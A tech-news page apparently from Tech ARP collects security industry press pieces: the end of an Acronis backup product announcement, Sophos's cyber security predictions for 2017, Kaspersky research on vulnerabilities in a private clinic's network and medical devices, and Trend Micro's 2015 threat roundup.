  • Acronis ASign for blockchain-based document certification. Acronis ASign allows multiple parties to execute and certify a document with a secure and publicly auditable digital signature. Users can protect their backed-up documents, which are verified with Acronis Notary and electronically signed – all within the same reliable backup solution.

Eugene Kaspersky, chairman and CEO of Kaspersky Lab, said: “The world is facing a rising and increasingly dangerous tide of ransomware affecting individuals and businesses alike. Of course, ideally you should never pay criminals if your data is encrypted by ransomware; that’s all very well in theory, but when it’s your family photos or business documents encrypted, the idealism can swiftly go out the window. There are many measures that can be taken to avoid the damage from ransomware, but a high-end Internet security suite and a reliable backup disconnected from the system is still essential to ensure business continuity if the worst does still happen. And I welcome Acronis’s introduction of backup suited to this trend.”

[adrotate banner=”5″]

Besides the unique new capabilities, Acronis True Image 2017 New Generation introduces many more improvements and innovative features to secure Acronis’ position as the leading, fastest, and most innovative consumer backup provider:

  • Easy to use, modern interface: A touch-friendly interface across all devices with an easy-to-use web interface for remote data access and management.
  • Additional features for Mac users: Unmounted NAS support for source and backup destinations, wireless backup of mobile devices to Mac computers with local data browsing capabilities; file notarization and electronic signatures via Acronis Notary and Acronis ASign, and support for Mac OS X Sierra.
  • Complete mobile backup experience: AES-256 data encryption, file preview and recovery, browsing of all cloud backups from a mobile device.
  • Backup and recovery capabilities for Facebook accounts: Browse and recover a Facebook account data to an existing or new account with data encrypted and stored in the Acronis Cloud.

 

Acronis True Image 2017 New Generation Pricing and Availability

Acronis True Image 2017 New Generation is a new premium subscription for the award-winning Acronis True Image backup solution. Special upgrade pricing is available for the existing Acronis True Image customers.

The Acronis True Image 2017 New Generation will be available in 1, 3 and 5 computer offerings, at a MSRP of US$99.99, US$149.99 and US$159.99 respectively. All subscriptions are for 1-year and includes 1TB Acronis Cloud Storage.

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Sophos Predicts Top 10 Cyber Security Trends for 2017

22 December 2016 – 2016 saw a huge number and variety of cyber attacks, ranging from a high-profile DDoS using hijacked Internet-facing security cameras to the alleged hacking of party officials during the US election. The year also saw a rising tide of data breaches, from organizations big and small, and significant losses of people’s personal information. With the year almost over, Joergen Jakobsen, regional vice president for Asia-Pacific and Japan (APJ) at Sophos, looks into his crystal ball to predict the top cyber security trends for 2017:

#1 : Shift from exploitation to targeted social attacks.

Cybercriminals are getting better at exploiting the ultimate vulnerability – humans. Ever more sophisticated and convincing targeted attacks seek to coax users into compromising themselves. For example, it’s common to see an email that addresses the recipient by name and claim they have an outstanding debt the sender has been authorized to collect. Applying shock by pretending to be borrowing authority or law enforcement are common and effective tactics. The email directs users to a malicious link that they are panicked into clicking on, opening them up to attack. Such phishing attacks can no longer be recognized by obvious mistakes.

#2 : Financial infrastructure at greater risk of attack.

The use of targeted phishing and “whaling” continues to grow. These attacks use detailed information about company executives to trick employees into paying fraudsters or compromising accounts. We also expect more attacks on critical financial infrastructure, such as the attack involving SWIFT-connected institutions which cost the Bangladesh Central Bank $81 million in February. SWIFT recently revealed that there have been other such attacks and it expects to see more, stating in a leaked letter to client banks: “The threat is very persistent, adaptive and sophisticated – and it is here to stay”.

#3 : Exploitation of the Internet’s inherently insecure infrastructure.

All Internet users rely on ancient foundational protocols, and their ubiquity makes them nearly impossible to revamp or replace. These archaic protocols that have long been the backbone of the Internet and business networks are sometimes surprisingly flaky. For example, attacks against BGP (Border Gateway Protocol) could potentially disrupt, hijack, or disable much of the Internet. And the DDoS attack on Dyn in October (launched by a myriad of IoT devices), took down the DNS provider and, along with it, access to part of the internet. It was one of the largest assaults seen and those claiming responsibility said that it was just a dry run. Large-scale ISPs and enterprises can take some steps to respond, but these may well fail to prevent serious damage if individuals or states choose to exploit the Internet’s deepest security flaws.

#4 : Increased attack complexity.

Attacks increasingly bring together multiple technical and social elements, and reflect careful, lengthy probing of the victim organization’s network. Attackers compromise multiple servers and workstations long before they start to steal data or act aggressively. Closely managed by experts, these attacks are strategic, not tactical, and can cause far more damage. This is a very different world to the pre-programmed and automated malware payloads we used to see – patient and evading detection.

#5 : Growth of malvertising and corruption of online advertising ecosystems.

Malvertising, which spreads malware through online ad networks and web pages, has been around for years. But in 2016, we saw much more of it. These attacks highlight larger problems throughout the advertising ecosystem, such as click fraud, which generates paying clicks that don’t correspond to real customer interest. Malvertising has actually generated click fraud, compromising users and stealing from advertisers at the same time. [adrotate group=”2″]

#6 : Ransomware evolves.

As more users recognize the risks of ransomware attack via email, criminals are exploring other vectors. Some are experimenting with malware that reinfects later, long after a ransom is paid, and some are starting to use built-in tools and no executable malware at all to avoid detection by endpoint protection code that focuses on executable files. Recent examples have offered to decrypt files after the victim shared the ransomware with two friends, and those friends paid to decrypt their files. Ransomware authors are also starting to use techniques other than encryption, for example deleting or corrupting file headers. And finally, with “old” ransomware still floating around the web, users may fall victim to attacks that can’t be “cured” because payment locations no longer work.

#7 : Emergence of personal IoT attacks.

Users of home IoT devices may not notice or even care if their baby monitors are hijacked to attack someone else’s website. But once attackers “own” a device on a home network, they can compromise other devices, such as laptops containing important personal data. We expect to see more of this as well as more attacks that use cameras and microphones to spy on households. Cyber criminals always find a way to profit.

#8 : Rising focus on exploits against virtualized and cloud systems.

Attacks against physical hardware raise the possibility of dangerous new exploits against virtualized cloud systems. Attackers might abuse the host or other guests running on a shared host, attack privilege models, and conceivably access others’ data. And, as Docker and the entire container (or ‘serverless’) eco-system become more popular, attackers will increasingly seek to discover and exploit vulnerabilities in this relatively new trend in computing. We expect active attempts to operationalize such attacks.

#9 : Destructive DDoS ioT attacks will rise.

In 2016, Mirai the malware that turns computer systems running Linux into remotely controlled “bots”, that can be used in large-scale network attacks, showed the massive destructive potential of DDoS attacks as a result of insecure consumer IoT (Internet of Things) devices. Mirai’s attacks exploited only a small number of devices and vulnerabilities and used basic password guessing techniques. However, cybercriminals will find it easy to extend their reach because there are several IoT devices containing outdated code based on poorly-maintained operating systems and applications with well-known vulnerabilities. Expect IoT exploits, better password guessing and more compromised IoT devices being used for DDoS or perhaps to target other devices in your network.

#10 : Technical attacks against states and societies.

Technology-based attacks have become increasingly political. Societies face growing risks from both disinformation (e.g., “fake news”) and voting system compromise. For instance, researchers have demonstrated attacks that might allow a local voter to fraudulently vote repeatedly without detection. Even if states never engage in attacks against their adversaries’ elections, the perception that these attacks are possible is itself a powerful weapon.

Go Back To > Cybersecurity | Home

[adrotate group=”1″]  

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Kaspersky Lab Finds Security Weaknesses in Clinic IT

25 March 2016 – A Kaspersky Lab Global Research & Analysis Team (GReAT) expert has conducted real field research at one private clinic in an attempt to explore its security weaknesses and how to address them. Vulnerabilities were found in medical devices that opened a door for cybercriminals to access the personal data of patients, as well as their physical well-being.

A modern clinic is a complicated system. It has sophisticated medical devices that comprise fully functional computers with an operating system and applications installed on them. Doctors rely on computers, and all information is stored in a digital format. In addition, all healthcare technologies are connected to the Internet.

So, it comes as no surprise that both medical devices and hospital IT infrastructure have previously been targeted by hackers. The most recent examples of such incidents are ransomware attacks against hospitals in the US and Canada. But a massive malicious attack is only one way in which criminals could exploit the IT infrastructure of a modern hospital.

 

Clinics store personal information about their patients. They also own and use very expensive, hard to fix and replace equipment, which makes them a potentially valuable target for extortion and data theft.

The outcome of a successful cyberattack against a medical organization could differ in detail but will always be dangerous. It could involve the following:

  • The felonious use of personal patient data: the resale of information to third parties or demanding the clinic pay a ransom to get back sensitive information about patients;
  • The intentional falsification of patient results or diagnoses;
  • Medical equipment damage may cause both physical damage to patients and huge financial losses to a clinic;
  • Negative impact on the reputation of a clinic.

 

Exposure to the Internet

The first thing that a Kaspersky Lab expert decided to explore, while conducting this research, was to understand how many medical devices around the globe are now connected to the Internet. Modern medical devices are fully-functional computers with an operating system and most of these have a communication channel to the Internet. By hacking them, criminals could interfere with their functionality.

A quick look over the Shodan search engine for Internet-connected devices showed hundreds of devices – from MRI scanners, to cardiology equipment, radioactive medical equipment and other related devices are registered there. This discovery leads to worrisome conclusions – some of these devices still work on old operational systems such as Windows XP, with unpatched vulnerabilities, and some even use default passwords that can be easily found in public manuals.

Using these vulnerabilities criminals could access a device interface and potentially affect the way it works.

 

Inside clinic’s local network

The above mentioned scenario was one of the ways in which cybercriminals could get access to the clinic’s critical infrastructure. But the most obvious and logical way is to try to attack its local network. And here we go: during the research a vulnerability was found in the clinic’s Wi-Fi connection. Through a weak communications protocol access to the local network was gained.

Exploring the local clinic’s network, the Kaspersky Lab expert found some medical equipment that was previously found on Shodan. This time however, to get access to the equipment one didn’t need any password at all – because the local network was a trusted network for medical equipment applications and users. This is how a cybercriminal can gain access to a medical device.

Further exploring the network, the Kaspersky Lab expert discovered a new vulnerability in a medical device application. A command shell was implemented in the user’s interface that could give cybercriminals access to personal patient information, including their clinical history and information about medical analysis, as well as their addresses and ID details. Moreover, through this vulnerability the whole device controlled with this application could be compromised. For example, among these devices could be MRI scanners, cardiology equipment, radioactive and surgical equipment.

Firstly, criminals could alter the way the device works and cause physical damage to the patients. Secondly, criminals could damage the device itself at immense cost to the hospital.

“Clinics are no longer only doctors and medical equipment, but IT services too. The work of a clinic’s internal security services affects the safety of patient data and the functionality of its devices. Medical software and equipment engineers put a lot of effort into creating a useful medical device that will save and protect human life, but they sometimes completely forget about protecting it from unauthorized external access. When it comes to new technologies, safety issues should be addressed at the first stage of the research and development (R&D) process.

IT security companies could help at this stage to address safety issues”, mentions Sergey Lozhkin, senior researcher at Kaspersky Lab’s GReAT.

[adrotate banner=”5″]

Kaspersky Lab experts recommend implementing the following measures to protect clinics from unauthorized access:

  • Use strong passwords to protect all external connection points;
  • Update IT security policies, develop on time patch management and vulnerability assessments;
  • Protect medical equipment applications in the local network with passwords in case of an unauthorized access to the trusted area;
  • Protect infrastructure from threats like malware and hacking attacks with a reliable security solution;
  • Backup critical information regularly and keep a backup copy offline.

 

Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participate in the Tech ARP Forums, or even donate to our fund. Any help you can render is greatly appreciated!

Trend Micro 2015 Security Roundup Details

9 March 2016 – Today, Trend Micro Incorporated released its 2015 security roundup report, “Setting the Stage: Landscape Shifts Dictate Future Threat Response Strategies,” which dissects the most significant security incidents from 2015. The research confirms attackers are now bolder, smarter and more daring in attack vectors, cyberespionage efforts and cyber underground activity on a global basis.

“Our observations for 2015 have confirmed that traditional methods of protecting data and assets are no longer sufficient and should be reassessed to maintain the highest level of corporate and personal security,” said Raimund Genes, CTO, Trend Micro. “The prevalence and sophistication of extortion, cyberespionage and expanding targeted attacks now dictate that organizational security strategies must be prepared to defend against a potentially greater onslaught in 2016. This realization can help the security community better anticipate and respond to what attackers are trying to accomplish.”

Online extortion and cyberattacks were a top concern in 2015, with several high-profile organizations being victimized. Ashley Madison, Hacking Team, the Office of Personal Management and Anthem were a few of these high-profile attacks that left millions of employees and customers exposed. A majority of data breaches in the U.S. in 2015 (41 percent) were caused by device loss, followed by malware and hacking.
Additional report highlights include:

  • Pawn Storm and Zero-Days – In 2015 there were more than 100 zero-days discovered in addition to the long-running cyberespionage campaign Pawn Storm utilized several zero-day exploits to target high-profile organizations, including a U.S. defense organization, the armed forces of a NATO country and several foreign affairs ministries.
  • Deep Web and Underground Explorations – In 2015, cybercriminal markets began to penetrate the recesses of the Deep Web. Each underground market mirrors the culture in which it resides, offering specific wares most profitable in each region.
  • Smart Technology Nightmares – Attacks against connected devices accelerated in 2015, proving their susceptibility. Smart cars and businesses, seen in Trend Micro’s GasPot experiment, were among a few of the new concerns brought by IoT technologies.
  • Angler, the ‘King of Exploit Kits’ – From malvertising to Adobe Flash, Angler Exploit Kit gained notoriety in 2015 as the most used exploit. Accounting for 57.3 percent of overall exploit kit usage. Japan, the U.S. and Australia were among the most impacted countries for this attack.
  • Data Held Hostage – Crypto-ransomware rose to 83 percent of overall ransomware use in 2015. Cryptowall was the most frequently used variant, arriving on users’ computers via email or malicious downloads.
  • Takedowns versus DRIDEX – The seizure and takedown of the notorious DRIDEX botnet contributed to a significant decrease in detections within the U.S. However, this led to a resurgence due to the Command and Control infrastructure being hosted on a bulletproof hosting provider, making it virtually impossible to eradicate altogether.
[adrotate banner=”5″]

 

Support Tech ARP!

If you like our work, you can help support out work by visiting our sponsors, participate in the Tech ARP Forums, or even donate to our fund. Any help you can render is greatly appreciated!